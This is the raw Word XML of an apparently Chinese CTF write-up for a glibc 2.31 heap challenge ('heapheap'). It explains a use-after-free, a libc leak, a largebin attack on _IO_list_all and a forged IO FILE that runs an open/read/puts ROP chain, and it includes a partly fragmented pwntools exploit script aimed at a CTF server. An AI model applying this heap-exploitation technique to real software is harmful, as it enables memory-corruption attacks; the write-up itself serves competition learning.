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6034" w14:textId="0E964C98" w:rsidR="00437A38" w:rsidRDefault="008A6E0E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Nebu1ea </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>韩磊</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00D713DE">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>1504895347@</w:t>
        </w:r>
        <w:r w:rsidRPr="00D713DE">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>qq</w:t>
        </w:r>
        <w:r w:rsidRPr="00D713DE">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FFE1E2A" w14:textId="77777777" w:rsidR="008A6E0E" w:rsidRDefault="008A6E0E"/>
    <w:p w14:paraId="580B2A6E" w14:textId="0F254FFB" w:rsidR="008A6E0E" w:rsidRDefault="008A6E0E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn:</w:t>
      </w:r>
      <w:r w:rsidR="006F626D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eapheap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DA915" w14:textId="77777777" w:rsidR="008A6E0E" w:rsidRDefault="008A6E0E"/>
    <w:p w14:paraId="1453C505" w14:textId="457A5378" w:rsidR="008A6E0E" w:rsidRDefault="008A6E0E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F65DDE" w14:textId="5CEA7338" w:rsidR="008A6E0E" w:rsidRPr="008A6E0E" w:rsidRDefault="008A6E0E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用ida64打开附件，考的是2.31版的堆，静止了execve的调用，并把沙箱给打开了，</w:t>
      </w:r>
      <w:r w:rsidR="006F626D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以应该只能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用read以及puts函数来输出flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D64DC3" w14:textId="42FDD1DE" w:rsidR="008A6E0E" w:rsidRDefault="008A6E0E">
      <w:r w:rsidRPr="008A6E0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E69050C" wp14:editId="63CDA103">
            <wp:extent cx="5274310" cy="2279015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1742775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75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CF21" w14:textId="77777777" w:rsidR="00C83D51" w:rsidRDefault="008A6E0E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上方是delete函数，有个UAF漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00483AD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，同时chunk的size限制在0x400到0x500中间，所以应该是打IO。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF9ED6C" w14:textId="1AB1D23D" w:rsidR="00483AD3" w:rsidRDefault="00C83D51">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题步骤：</w:t>
      </w:r>
      <w:r w:rsidR="00483AD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先free一个chunk然后show可以拿到libc的main_arena地址，手动减去偏移就是libc基址了。然后利用覆写bk_nextsize函数进行largebin attack把chunk地址写到IO_list_all伪造IO，最后调用exit触发IO把ROP链子跑起</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidR="00FD0E80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出flag即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F244F5" w14:textId="1CB85765" w:rsidR="00483AD3" w:rsidRDefault="00FD0E80">
      <w:r w:rsidRPr="00FD0E80">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66FD74E9" wp14:editId="3C101041">
            <wp:extent cx="5274310" cy="3804920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1560843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43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5822" w14:textId="27D26222" w:rsidR="00483AD3" w:rsidRDefault="00483AD3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6506E2DA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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0E8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5439B6C9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Crypto.Util.number </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0E8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long_to_bytes, bytes_to_long </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452624F2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context.log_level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'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63642F47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>context(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arch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'amd64'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os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'linux'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576AF0E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context.terminal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'tmux'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'splitw'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'-h'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05267405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script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2F3DA5AE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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    b _IO_flush_all_lockp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09D116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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    b exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A720C4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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    b _IO_wfile_seekoff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0EF13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E9178"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>    b _IO_switch_to_wget_mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090066BA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6F71913C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remote(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'182.92.237.102'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11000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2DD9651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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>add_note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idx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9DC9471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.sendlineafter(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"Your choice:"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E3785FF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.sendlineafter(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"index:"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idx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131C6467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.sendlineafter(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"Size"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434471F3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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>show_note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idx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3D44966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.sendlineafter(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"Your choice:"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210AAE3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.sendlineafter(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"index:"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idx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478C8B2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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>edit_note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idx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con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8B7FC74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.sendlineafter(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"Your choice:"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55CB2ED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.sendlineafter(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"index:"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idx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4048FE32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.sendlineafter(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"context:"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con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B4CA4AC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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>delete_note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idx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6563286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.sendlineafter(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"Your choice:"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"4"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3DD28EE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.sendlineafter(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"index:"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idx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1677FBAB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CDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE945C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.sendlineafter(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"Your choice:"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"5"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88E3A9B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add_note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450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36B1416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add_note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450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DEE90A4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add_note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440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42FDF22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add_note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460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B90096B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edit_note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'./flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0E80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FC647A2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delete_note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4B6CBC5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show_note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3B42E11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.recv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258126D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.recv(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C7A7AE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u64(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.recv(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D0E80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00\x00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1788E03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750c7589cbe0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750c756b0000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8ECCDB9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io_all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1ED5A0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9D1ABC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add_note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4f0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91760C2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edit_note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,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io_all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50E7D0BC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delete_note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83FA977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lastRenderedPageBreak/>
        <w:t>add_note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4f0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D552D05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show_note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7ACFD24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.recvuntil(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 xml:space="preserve">"context: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0E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27856AC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heap_addr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u64(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.recv(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D0E80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\x00\x00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DA1E36C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fake_io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heap_addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E5F07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IO_file_jumps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1E94A0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B0839B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IO_wfile_jumps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1E8F60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B5B902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execve_addr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e3170</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70876A8C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setcontext_61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54F20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61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F817C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lr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578C8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE73900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578C9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2082B5BB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pop_rdi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023b6a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51827CCE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pop_rsi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2601f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FADBAE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pop_rdx_r12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0119431</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA6AD1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open64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10df00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770AE24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read_a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10e1e0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5693A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puts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84420</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32C139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heap_addr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653af7781b50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653af77816f0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4C2B5171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libc_base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79ab21b9e6a0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79ab219b1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E03C8F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flat({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198011FE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[p64(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), p64(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), p64(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), p64(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),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fake_io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138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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F0128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a0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[p64(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fake_io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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C4B19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c0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[p64(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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79E9AD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d8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[p64(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IO_wfile_jumps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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29068BC2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110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[p64(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fake_io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118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)],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C5941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118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flat({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F691343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[p64(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setcontext_61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)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14ECE6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},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filler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D0E80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16D0FB44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138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flat({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A440CA8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fake_io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1e8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</w:p>
    <w:p w14:paraId="4FA688A2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70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p64(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2D49581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p64(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707849DB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a0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fake_io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1e8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1B64826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a8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8FAC1BB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},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filler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D0E80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26E6FA4D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1e8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flat({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D2DE0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pop_rdi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pop_rsi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open64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pop_rdi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pop_rsi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pop_rdx_r12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read_a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pop_rdi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puts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8758BF2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    },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filler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D0E80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08684C7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},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filler</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0E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D0E80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FD0E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3A0932C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edit_note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D0E8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FD0E8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:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423AC066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exploit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2F3D27C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lastRenderedPageBreak/>
        <w:t>print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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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io_all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3EDEB930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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex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D0E80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>heap_addr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1732DA0" w14:textId="77777777" w:rsidR="00FD0E80" w:rsidRPr="00FD0E80" w:rsidRDefault="00FD0E80" w:rsidP="00FD0E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0E8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D0E80">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CCCCCC"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE929AF" w14:textId="77777777" w:rsidR="00483AD3" w:rsidRDefault="00483AD3"/>
    <w:sectPr w:rsidR="0048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8D"/>
    <w:rsid w:val="00024416"/>
    <w:rsid w:val="001B408D"/>
    <w:rsid w:val="00361492"/>
    <w:rsid w:val="004257E6"/>
    <w:rsid w:val="00437A38"/>
    <w:rsid w:val="00464929"/>
    <w:rsid w:val="00483AD3"/>
    <w:rsid w:val="006F626D"/>
    <w:rsid w:val="008A6E0E"/>
    <w:rsid w:val="00C83D51"/>
    <w:rsid w:val="00FD0E80"/>
    <w:rsid w:val="00FE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3864"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A980CFAA-5096-465A-9A4E-4E3D9A52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40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40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40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40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40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40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40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40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40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40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408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B40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40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40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40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40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40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40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40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40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40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40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40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408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A6E0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6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150489534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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-13T02:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-13T03:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>